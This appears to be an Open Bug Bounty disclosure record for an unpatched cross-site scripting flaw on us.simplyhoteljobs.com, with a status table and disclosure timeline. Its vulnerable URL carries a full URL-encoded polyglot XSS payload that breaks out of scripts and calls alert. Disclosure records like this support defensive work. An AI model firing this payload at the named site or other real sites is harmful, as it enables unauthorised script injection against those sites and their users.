us.simplyhoteljobs.com XSS vulnerability

2016-07-05T16:03:00
ID OBB:164217
Type openbugbounty
Reporter findingxssbugs
Modified 2016-07-13T06:11:00

Description

Vulnerable URL:
http://us.simplyhoteljobs.com/jobs?keyword=%27%3Balert%28String.fromCharCode%2879%2C80%2C69%2C78%2C66%2C85%2C71%2C66%2C79%2C85%2C78%2C84%2C89%29%29%2F%2F%27%3Balert%28String.fromCharCode%2879%2C80%2C69%2C78%2C66%2C85%2C71%2C66%2C79%2C85%2C78%2C84%2C89%29%29%2F%2F%22%3B+alert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2879%2C80%2C69%2C78%2C66%2C85%2C71%2C66%2C79%2C85%2C78%2C84%2C89%29%29%2F%2F--+%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2879%2C80%2C69%2C78%2C66%2C85%2C71%2C66%2C79%2C85%2C78%2C84%2C89%29%29%3C%2FSCRIPT%3E
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No
Check us.simplyhoteljobs.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 5 July, 2016 16:03 GMT
Vulnerability existence verified and confirmed| 6 July, 2016 05:38 GMT
Notification sent to subscribers (without technical details)| 6 July, 2016 06:17 GMT
Vulnerability details disclosed by researcher| 13 July, 2016 06:11 GMT